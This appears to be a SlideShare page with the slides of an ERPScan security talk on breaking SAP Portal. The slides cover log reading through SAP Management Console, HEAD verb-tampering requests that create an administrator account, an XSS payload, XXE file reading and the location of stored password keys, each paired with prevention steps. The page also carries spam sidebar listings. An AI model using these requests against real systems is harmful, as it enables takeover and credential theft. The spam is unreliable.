Attacking SAP Mobile
 
Securing SAP in 5 steps
Securing SAP in 5 stepsSecuring SAP in 5 steps
Securing SAP in 5 steps
 
Practical SAP pentesting (B-Sides San Paulo)
Practical SAP pentesting (B-Sides San Paulo)Practical SAP pentesting (B-Sides San Paulo)
Practical SAP pentesting (B-Sides San Paulo)
 
5 real ways to destroy business by breaking SAP applications
5 real ways to destroy business by breaking SAP applications5 real ways to destroy business by breaking SAP applications
5 real ways to destroy business by breaking SAP applications
 
What CISOs should know about SAP security
What CISOs should know about SAP securityWhat CISOs should know about SAP security
What CISOs should know about SAP security
 
EAS-SEC: Framework for securing business applications
EAS-SEC: Framework for securing business applicationsEAS-SEC: Framework for securing business applications
EAS-SEC: Framework for securing business applications
 
Practical SAP pentesting workshop (NullCon Goa)
Practical SAP pentesting workshop (NullCon Goa)Practical SAP pentesting workshop (NullCon Goa)
Practical SAP pentesting workshop (NullCon Goa)
 

Ähnlich wie Breaking SAP portal (HashDays)

UCS Management APIs A Technical Deep Dive
UCS Management APIs A Technical Deep DiveUCS Management APIs A Technical Deep Dive
UCS Management APIs A Technical Deep Dive
Cisco DevNet
 
Ride on the Fast Track of Web with Ruby on Rails- Part 2
Ride on the Fast Track of Web with Ruby on Rails- Part 2Ride on the Fast Track of Web with Ruby on Rails- Part 2
Ride on the Fast Track of Web with Ruby on Rails- Part 2
A.K.M. Ahsrafuzzaman
 
Entity Linking and REST Patterns in SOA
Entity Linking and REST Patterns in SOA Entity Linking and REST Patterns in SOA
Entity Linking and REST Patterns in SOA
WSO2
 

Ähnlich wie Breaking SAP portal (HashDays) (20)

A crushing blow at the heart of SAP’s J2EE Engine.
A crushing blow at the heart of SAP’s J2EE Engine. A crushing blow at the heart of SAP’s J2EE Engine.
A crushing blow at the heart of SAP’s J2EE Engine.
 
Monitoring Agile PLM with JConsole
Monitoring Agile PLM with JConsole Monitoring Agile PLM with JConsole
Monitoring Agile PLM with JConsole
 
Pixels_Camp
Pixels_CampPixels_Camp
Pixels_Camp
 
UCS Management APIs A Technical Deep Dive
UCS Management APIs A Technical Deep DiveUCS Management APIs A Technical Deep Dive
UCS Management APIs A Technical Deep Dive
 
Securing your Oracle Fusion Middleware Environment, On-Prem and in the Cloud
Securing your Oracle Fusion Middleware Environment, On-Prem and in the CloudSecuring your Oracle Fusion Middleware Environment, On-Prem and in the Cloud
Securing your Oracle Fusion Middleware Environment, On-Prem and in the Cloud
 
Servlets 3.0 - Asynchronous, Extensibility, Ease-of-use @ JavaOne Brazil 2010
Servlets 3.0 - Asynchronous, Extensibility, Ease-of-use @ JavaOne Brazil 2010Servlets 3.0 - Asynchronous, Extensibility, Ease-of-use @ JavaOne Brazil 2010
Servlets 3.0 - Asynchronous, Extensibility, Ease-of-use @ JavaOne Brazil 2010
 
Liferay Devcon presentation on Workflow & Dynamic Forms
Liferay Devcon presentation on Workflow & Dynamic FormsLiferay Devcon presentation on Workflow & Dynamic Forms
Liferay Devcon presentation on Workflow & Dynamic Forms
 
Liferay Devcon Presentation on Dynamic Forms with Liferay Workflow
Liferay Devcon Presentation on Dynamic Forms with Liferay WorkflowLiferay Devcon Presentation on Dynamic Forms with Liferay Workflow
Liferay Devcon Presentation on Dynamic Forms with Liferay Workflow
 
Building microservices sample application
Building microservices sample applicationBuilding microservices sample application
Building microservices sample application
 
Bringing the JAMstack to the Enterprise
Bringing the JAMstack to the EnterpriseBringing the JAMstack to the Enterprise
Bringing the JAMstack to the Enterprise
 
Ride on the Fast Track of Web with Ruby on Rails- Part 2
Ride on the Fast Track of Web with Ruby on Rails- Part 2Ride on the Fast Track of Web with Ruby on Rails- Part 2
Ride on the Fast Track of Web with Ruby on Rails- Part 2
 
Rich Portlet Development in uPortal
Rich Portlet Development in uPortalRich Portlet Development in uPortal
Rich Portlet Development in uPortal
 
Software as a Service workshop / Unlocked: the Hybrid Cloud 12th May 2014
Software as a Service workshop / Unlocked: the Hybrid Cloud 12th May 2014Software as a Service workshop / Unlocked: the Hybrid Cloud 12th May 2014
Software as a Service workshop / Unlocked: the Hybrid Cloud 12th May 2014
 
Mysql nowwhat
Mysql nowwhatMysql nowwhat
Mysql nowwhat
 
AtlasCamp 2015: Connect everywhere - Cloud and Server
AtlasCamp 2015: Connect everywhere - Cloud and ServerAtlasCamp 2015: Connect everywhere - Cloud and Server
AtlasCamp 2015: Connect everywhere - Cloud and Server
 
Progress application server for openedge best practices - PUG Baltic Annual C...
Progress application server for openedge best practices - PUG Baltic Annual C...Progress application server for openedge best practices - PUG Baltic Annual C...
Progress application server for openedge best practices - PUG Baltic Annual C...
 
NZ Code Camp 2011 PowerShell + SharePoint
NZ Code Camp 2011 PowerShell + SharePointNZ Code Camp 2011 PowerShell + SharePoint
NZ Code Camp 2011 PowerShell + SharePoint
 
Agile integration workshop Seattle
Agile integration workshop SeattleAgile integration workshop Seattle
Agile integration workshop Seattle
 
Sails.js Intro
Sails.js IntroSails.js Intro
Sails.js Intro
 
Entity Linking and REST Patterns in SOA
Entity Linking and REST Patterns in SOA Entity Linking and REST Patterns in SOA
Entity Linking and REST Patterns in SOA
 

Mehr von ERPScan

Oracle PeopleSoft applications are under attack (HITB AMS)
Oracle PeopleSoft applications are under attack (HITB AMS)Oracle PeopleSoft applications are under attack (HITB AMS)
Oracle PeopleSoft applications are under attack (HITB AMS)
ERPScan
 
SAP security landscape. How to protect(hack) your(their) big business
SAP security landscape. How to protect(hack) your(their) big businessSAP security landscape. How to protect(hack) your(their) big business
SAP security landscape. How to protect(hack) your(their) big business
ERPScan
 
EAS-SEC Project
EAS-SEC ProjectEAS-SEC Project
EAS-SEC Project
ERPScan
 
Assess and monitor SAP security
Assess and monitor SAP securityAssess and monitor SAP security
Assess and monitor SAP security
ERPScan
 
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...
ERPScan
 
With big data comes big responsibility
With big data comes big responsibilityWith big data comes big responsibility
With big data comes big responsibility
ERPScan
 

Mehr von ERPScan (12)

Chinese attack on USIS exploiting SAP vulnerability. Detailed review and comm...
Chinese attack on USIS exploiting SAP vulnerability. Detailed review and comm...Chinese attack on USIS exploiting SAP vulnerability. Detailed review and comm...
Chinese attack on USIS exploiting SAP vulnerability. Detailed review and comm...
 
Oracle PeopleSoft applications are under attacks (Hack in Paris)
Oracle PeopleSoft applications are under attacks (Hack in Paris)Oracle PeopleSoft applications are under attacks (Hack in Paris)
Oracle PeopleSoft applications are under attacks (Hack in Paris)
 
Oracle PeopleSoft applications are under attack (HITB AMS)
Oracle PeopleSoft applications are under attack (HITB AMS)Oracle PeopleSoft applications are under attack (HITB AMS)
Oracle PeopleSoft applications are under attack (HITB AMS)
 
Implementing SAP security in 5 steps
Implementing SAP security in 5 stepsImplementing SAP security in 5 steps
Implementing SAP security in 5 steps
 
SAP security landscape. How to protect(hack) your(their) big business
SAP security landscape. How to protect(hack) your(their) big businessSAP security landscape. How to protect(hack) your(their) big business
SAP security landscape. How to protect(hack) your(their) big business
 
13 real ways to destroy business by breaking company’s SAP applications
13 real ways to destroy business by breaking company’s SAP applications13 real ways to destroy business by breaking company’s SAP applications
13 real ways to destroy business by breaking company’s SAP applications
 
EAS-SEC Project
EAS-SEC ProjectEAS-SEC Project
EAS-SEC Project
 
All your SAP passwords belong to us
All your SAP passwords belong to usAll your SAP passwords belong to us
All your SAP passwords belong to us
 
Assess and monitor SAP security
Assess and monitor SAP securityAssess and monitor SAP security
Assess and monitor SAP security
 
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...
 
With big data comes big responsibility
With big data comes big responsibilityWith big data comes big responsibility
With big data comes big responsibility
 
SAP security in figures
SAP security in figuresSAP security in figures
SAP security in figures
 

Kürzlich hochgeladen

%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
masabamasaba
 
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
masabamasaba
 
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
panagenda
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
Delhi Call girls
 
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Steffen Staab
 
%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...
%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...
%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...
masabamasaba
 
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
Health
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
Delhi Call girls
 

Kürzlich hochgeladen (20)

MarTech Trend 2024 Book : Marketing Technology Trends (2024 Edition) How Data...
MarTech Trend 2024 Book : Marketing Technology Trends (2024 Edition) How Data...MarTech Trend 2024 Book : Marketing Technology Trends (2024 Edition) How Data...
MarTech Trend 2024 Book : Marketing Technology Trends (2024 Edition) How Data...
 
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
 
Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...
Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...
Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...
 
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
 
WSO2CON 2024 - Does Open Source Still Matter?
WSO2CON 2024 - Does Open Source Still Matter?WSO2CON 2024 - Does Open Source Still Matter?
WSO2CON 2024 - Does Open Source Still Matter?
 
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
 
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
 
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
 
tonesoftg
tonesoftgtonesoftg
tonesoftg
 
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
 
%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...
%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...
%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...
 
%in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park %in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park
 
Right Money Management App For Your Financial Goals
Right Money Management App For Your Financial GoalsRight Money Management App For Your Financial Goals
Right Money Management App For Your Financial Goals
 
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdfPayment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
 
Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
Direct Style Effect Systems - The Print[A] Example - A Comprehension AidDirect Style Effect Systems - The Print[A] Example - A Comprehension Aid
Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
 
8257 interfacing 2 in microprocessor for btech students
8257 interfacing 2 in microprocessor for btech students8257 interfacing 2 in microprocessor for btech students
8257 interfacing 2 in microprocessor for btech students
 
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
 
WSO2Con2024 - Enabling Transactional System's Exponential Growth With Simplicity
WSO2Con2024 - Enabling Transactional System's Exponential Growth With SimplicityWSO2Con2024 - Enabling Transactional System's Exponential Growth With Simplicity
WSO2Con2024 - Enabling Transactional System's Exponential Growth With Simplicity
 

Breaking SAP portal (HashDays)

  • 1. Invest  in  security   to  secure  investments   Breaking  SAP  Portal   Alexander  Polyakov     CTO  ERPScan  
  • 2. About  ERPScan   •  The   only   360-­‐degree   SAP   Security   solu8on   -­‐   ERPScan   Security   Monitoring  Suite  for  SAP   •  Leader  by  the  number  of  acknowledgements  from  SAP  (  150+  )   •  60+  presentaEons  key  security  conferences  worldwide   •  25  Awards  and  nominaEons   •  Research  team  -­‐  20  experts  with  experience  in    different  areas   of  security   •  Headquarters  in  Palo  Alto  (US)  and  Amsterdam  (EU)       2  
  • 3. Agenda     •  Say  hello  to  SAP  Portal   •  Breaking  Portal  through  SAP  Services   •  Breaking  Portal  through  J2EE  Engine   •  Breaking  Portal  through  Portal  issues   •  ERPScan  SAP  Pentes8ng  Tool  password  decrypt  module   •  Conclusion   3  
  • 4. SAP   •  The  most  popular  business  applica8on   •  More  than  180000  customers  worldwide     •  74%  of  Forbes  500  run  SAP   4  
  • 6. Say  hello  to  Portal   •  Point  of  web  access  to  SAP  systems   •  Point  of  web  access  to  other  corporate  systems   •  Way  for  aUackers  to  get  access  to  SAP  from  the  Internet   •  ~17  Portals  in  Switzerland,  according  to  Shodan   •  ~11  Portals  in  Switzerland,  according  to  Google   6  
  • 8. Okay,  okay.  SAP  Portal  is  important,  and  it  has  many   links  to  other  modules.  So  what?   8  
  • 10. SAP  Management  Console   •  SAP  MC  provides  a  common  framework  for  centralized  system   management   •  Allowing  to  see  the  trace  and  log  messages   •  Using  JSESSIONID  from  logs,  aUacker  can  log  into  Portal        What  we  can  find  into  logs?   10   Right!  File  userinterface.log  contains  calculated  JSESIONID   But…aUacker  must  have  creden8al  for  reading  log  file!   Wrong!    
  • 11. SAP  Management  Console   <?xml  version="1.0"?>   <SOAP-­‐ENV:Envelope  xmlns:SOAP-­‐ENV="hUp://schemas.xmlsoap.org/soap/envelope/"  xmlns:xsi="hUp:// www.w3.org/2001/XMLSchema-­‐instance"  xmlns:xs="hUp://www.w3.org/2001/XMLSchema">   <SOAP-­‐ENV:Header>          <sapsess:Session  xmlns:sapsess="hUp://www.sap.com/webas/630/soap/features/session/">          <enableSession>true</enableSession>   </sapsess:Session>   </SOAP-­‐ENV:Header>   <SOAP-­‐ENV:Body>          <ns1:ReadLogFile  xmlns:ns1="urn:SAPControl">                  <filename>j2ee/cluster/server0/log/system/userinterface.log</filename>                  <filter/>                  <language/>                  <maxentries>%COUNT%</maxentries>                  <statecookie>EOF</statecookie>          </ns1:ReadLogFile>   </SOAP-­‐ENV:Body>   </SOAP-­‐ENV:Envelope>   11  
  • 12. PrevenEon   Don’t  use  TRACE_LEVEL  =  3  in   produc8on  systems  or  delete  traces             hUp://help.sap.com/saphelp_nwpi71/helpdata/en/ d6/49543b1e49bc1fe10000000a114084/frameset.htm     12  
  • 14. SSO  (old  but  sEll  works)   •  SAP  implements  SSO  using  the  Header  Variable  Login  Module   creden8als   check   okay   cookie   AUacker   header_auth   cookie   tnx  Mariano  ;)     14  
  • 15. PrevenEon   •   Implement  proper  network  filters  to  avoid  direct   connec8ons  to  SAP     •   J2EE  Engine.  If  you  use  it  for  Windows  authen8ca8on,   switch  to  SPNegoLoginModule   hUp://help.sap.com/saphelp_nw73ehp1/helpdata/en/d0/ a3d940c2653126e10000000a1550b0/frameset.htm     15  
  • 17. Access  control      Web  Dynpro                                          -­‐  programma8c      Portal  iViews                                        -­‐  programma8c      J2EE  Web  apps                                -­‐  declara8ve   ProgrammaEc     By  UME   DeclaraEve       By  WEB.XML   17  
  • 18. DeclaraEve  access  control   •  The  central  en8ty  in  the  J2EE  authoriza8on  model  is  the  security   role.   •  Programmers  define  the  applica8on-­‐specific  roles  in  the  J2EE   deployment  descriptor   web.xml      web-­‐j2ee-­‐engine.xml   18  
  • 20. web.xml   <servlet>          <servlet-­‐name>Cri8calAc8on</servlet-­‐name>          <servlet-­‐class>com.sap.admin.Cri8cal.Ac8on</servlet-­‐class>           </servlet>   <servlet-­‐mapping>              <servlet-­‐name>Cri8calAc8on</</servlet-­‐name>              <url-­‐paUern>/admin/cri8cal</url-­‐paUern>      </servlet-­‐mapping   <security-­‐constraint>   <web-­‐resource-­‐collec8on>   <web-­‐resource-­‐name>Restrictedaccess</web-­‐resource-­‐name>   <url-­‐paUern>/admin/*</url-­‐paUern>   <hUp-­‐method>GET</hUp-­‐method>   </web-­‐resource-­‐collec8on>   <auth-­‐constraint>            <role-­‐name>administrator</role-­‐name>    </auth-­‐constraint>   </security-­‐constraint>   20  
  • 21. Verb  Tampering     •  If  we  are  trying  to  get  access  to  an  applica8on  using  GET  –  we   need  a  login:pass  and  administrator  role   •  What  if  we  try  to  get  access  to  applica8on  using  HEAD  instead   GET?   •  PROFIT!   •  Did  U  know  about  ctc?   21  
  • 22. Verb  Tampering     Need  Admin  account  in  SAP  Portal?     Just  send  two  HEAD  requests     •  Create  new  user  blabla:blabla     HEAD  /ctc/ConfigServlet?param=com.sap.ctc.u8l.UserConfig;CREATEUSER;USERNAME=blabla,PASSWORD=blabla       •  Add  user  blabla  to  group  Administrators     HEAD  /ctc/ConfigServlet?param=com.sap.ctc.u8l.UserConfig;ADD_USER_TO_GROUP;USERNAME=blabla,GROUPNAME=Administrators       Works  when  UME  uses  JAVA  database       22  
  • 23. PrevenEon   • Install  SAP  notes  1503579,1616259     • Install  other  SAP  notes  about  Verb  Tampering       • Scan  applica8ons  with  ERPScan  WEB.XML  checker     • Disable  the  applica8ons  that  are  not  necessary     23  
  • 25. web.xml   <servlet>          <servlet-­‐name>Cri>calAc>on</servlet-­‐name>          <servlet-­‐class>com.sap.admin.Cri>cal.Ac>on</servlet-­‐class>           </servlet>   <servlet-­‐mapping>              <servlet-­‐name>Cri>calAc>on</</servlet-­‐name>              <url-­‐paBern>/admin/cri>cal</url-­‐paBern>      </servlet-­‐mapping   <security-­‐constraint>   <web-­‐resource-­‐collec>on>   <web-­‐resource-­‐name>Restrictedaccess</web-­‐resource-­‐name>   <url-­‐paBern>/admin/*</url-­‐paBern>   <hBp-­‐method>GET</hBp-­‐method>   <hBp-­‐method>HEAD</hBp-­‐method>   </web-­‐resource-­‐collec>on>   <auth-­‐constraint>            <role-­‐name>administrator</role-­‐name>    </auth-­‐constraint>   </security-­‐constraint>   GET  /admin/cri8cal/Cri>calAc>on   GET  /servlet/com.sap.admin.Cri8cal.Ac8on   25  
  • 26. Invoker  Servlet   •  Want  to  execute  an  OS  command  on  J2EE  server  remotely?   •  Maybe  upload  a  backdoor  in  a  Java  class?   •  Or  sniff  all  traffic  ?   S8ll  remember  ctc?   26  
  • 28. PrevenEon   •   Update  to  the  latest  patch  1467771,  1445998     • “EnableInvokerServletGlobally”    must  be  “false”       •   Check  all  WEB.XML  files  with  ERPScan  WEBXML   checker     28  
  • 29. So,  where  is  Portal?   29  
  • 30. SAP  Portal   •  User  access  rights  to  objects  are  in  the  Portal  Content  Directory   (PCD)   •  Based  on  ACL   •  2  types  of  access:   –  (design  8me)  for  administrators   –  (run8me)  for  users   30  
  • 31. Portal    Permission  Levels   31  
  • 32. End  User  permission   The  objects  where  end  user  permission  is  enabled  affect  the   following  areas  in  Portal:   –  All  Portal  Catalog  obj  with  end  user  permission     –  Authorized  Portal  users  may  access  restricted      Portal  components  by  URL  without  an  intermediate  iView  if  they  are   granted  permission      in  the  appropriate  security  zone.   32  
  • 33. Administrator  permission   •  Owner  =  full  control  +  modify  permissions   •  Full  control  =  read/write  +  delete  obj   •  Read/Write  =  read+write+edit  proper8es+  add/rem  child   •  Write  (folders  only)  =  create  objects   •  Read  =  view  obj+create  instances        (delta  links  and  copies)   •  None  =  access  not  granted   33  
  • 34. Role  Assigner  permission   •  The  Role  Assigner  permission  seyng  is  available  for  role  objects   •  It  allows  you  to  determine  which  Portal  users  are  permiUed  to   assign  other  users,  groups,  or  roles  to  the  role  principle  using   the  Role  Assignment  tool   34  
  • 35. Security  Zones     •  Security  zones  allow  the  system  administrator  to  control  which  Portal   components  and  Portal  services  a  Portal  user  can  launch   •  A  security  zone  specifies  the  vendor  ID,  the  security  area,  and  safety  level  for   each  Portal  component  and  Portal  service   •  The  security  zone  is  defined  in  a  Portal  applica8on  descriptor  XML  file   •  A  Portal  component  or  service  can  only  belong  to  one  security  zone;   however,  Portal  components  and  services  may  share  the  same  safety  level   •  Zones  allows  the  administrator  to  assign  permissions  to  a  safety  level,   instead  of  assigning  them  directly  to  each  Portal  component  or  service   35   Why?  To  group  mul>ple  iViews  easily    
  • 36. 36   We  can  get  access  to  Portal   iViews    using  direct  URL:     /irj/servlet/prt/portal/prtroot/<iView_ID>     And  only  Security  Zone  rights  will  be  checked    
  • 37. Security  Zones     •  So,  SecZones  offer  an  extra,  but  op8onal,  layer  of  code-­‐level   security  to  iViews   –  User-­‐>  check  ”end  user”  permission  to  the  role-­‐>  view  iView   –  User-­‐>  check  ”end  user”  permission  to  the  role-­‐>  check  ”end   user”  permission  to  the  SecZone  -­‐>  view  iView     By  default,  this  func8onality  is  disabled   37  
  • 38. 38   So  I  wonder  how  many  Portal   applica8ons  with  NoLow  Safety   exist?  
  • 39. Safety  Levels  for  Security  Zone   •  No  Safety   –  Anonymous  users  are  permiUed  to  access  portal  components  defined  in   the  security  zone.   •  Low  Safety   –  A  user  must  be  at  least  an  authen8cated  portal  user  to  access  portal   components  defined  in  the  security  zone.   •  Medium  Safety   –  A  user  must  be  assigned  to  a  par8cular  portal  role  that  is  authorized  to   access  portal  components  defined  in  the  security  zone   •  High  Safety   –  A  user  must  be  assigned  to  a  portal  role  with  higher  administra8ve  rights   that  is  authorized  to  access  portal  components  defined  in  the  security   zone.   39  
  • 40. No  safety  zone   Many  custom  applica8ons  with  low  security  level  zone   40  
  • 41. PrevenEon   Check  security  zones  permissions     • hUp://help.sap.com/saphelp_nw70/helpdata/en/25/85de55a94c4b5fa7a2d74e8ed201b0/frameset.htm   • hUp://help.sap.com/saphelp_nw70/helpdata/en/f6/2604db05fd11d7b84200047582c9f7/frameset.htm   41  
  • 42. SAP  Portal   •  Web  based  services   •  All  OWASP  TOP10  actual     –  XSS   –  Phishing   –  Traversal   –  XXE   –  …     42  
  • 44. XSS   •  Many  XSSs  in  Portal   •  But  some8mes  “hUponly”   •  But  when  we  exploit  XSS,  we  can  use  the  features  of  SAP  Portal   44  
  • 45. 45   <SCRIPT>      alert(EPCM.loadClientData("urn:com.sap.myObjects",  "person");   </SCRIPT>  
  • 46. EPCF          EPCF  provides  a  JavaScript  API  designed  for  the  client-­‐side   communica8on  between  portal  components  and  the  portal   core  framework   •  Enterprise  Portal  Client  Manager  (EPCM)   •  iViews  can  access  the  EPCM  object  from  every  portal  page   or  IFrame   •  Every  iView  contains  the  EPCM  object   •  For  example,  EPCF  used  for  transient  user  data  buffer  for  iViews   46  
  • 47. PrevenEon    Install  SAP  note  1656549   47  
  • 48. KM  Phishing   SAP  Knowledge  Management  may  be  used  to  create  phishing  pages   48  
  • 51. Directory  traversal  fix  bypass   51  
  • 52. PrevenEon   Install  SAP  note  1630293   52  
  • 53. 53   Cut  the  Crap,    Show  Me  the  Hack  
  • 54. Breaking  SAP  Portal   •  Found  a  file  in  the  OS  of  SAP  Portal  with  the  encrypted   passwords  for  administra8on  and  DB   •  Found  a  file  in  the  OS  of  SAP  Portal  with  keys  to  decrypt   passwords   •  Found  a  vulnerability  (another  one  ;))  which  allows  reading  the   files  with  passwords  and  keys   •  Decrypt  passwords  and  log  into  Portal   •  PROFIT!   54  
  • 55. Read  file   How  we  can  read  the  file?     –  Directory  Traversal   –  OS  Command  execute     –  XML  External  En8ty  (XXE)   55  
  • 56. XXE  in  Portal   56  
  • 57. XXE  in  Portal   57  
  • 58. XXE   Error  based  XXE   58  
  • 59. Breaking  SAP  Portal   •  Ok,  we  can  read  files   •  Where  are  the  passwords?   •  The  SAP  J2EE  Engine  stores  the  database  user  SAP<SID>DB;  its   password  is  here:   usrsap<SID>SYSglobalsecuritydataSecStore.proper>es     59  
  • 60. Where  are  the  passwords?  (config.proper<es)    rdbms.maximum_connec8ons=5   system.name=TTT   secstorefs.keyfile=/oracle/TTT/sapmnt/global/security/data/SecStore.key   secstorefs.secfile=/oracle/TTT/sapmnt/global/security/data/ SecStore.proper8es   secstorefs.lib=/oracle/TTTsapmnt/global/security/lib   rdbms.driverLoca8on=/oracle/client/10x_64/instantclient/ojdbc14.jar   rdbms.connec8on=jdbc/pool/TTT   rdbms.ini8al_connec8ons=1   60  
  • 61. Where  are  the  passwords?  (config.proper<es)    rdbms.maximum_connec8ons=5   system.name=TTT   secstorefs.keyfile=/oracle/TTT/sapmnt/global/security/data/SecStore.key   secstorefs.secfile=/oracle/TTT/sapmnt/global/security/data/SecStore.proper8es   secstorefs.lib=/oracle/TTTsapmnt/global/security/lib   rdbms.driverLoca8on=/oracle/client/10x_64/instantclient/ojdbc14.jar   rdbms.connec8on=jdbc/pool/TTT   rdbms.ini8al_connec8ons=1   61  
  • 62. 62   But  where  is  the  key?  
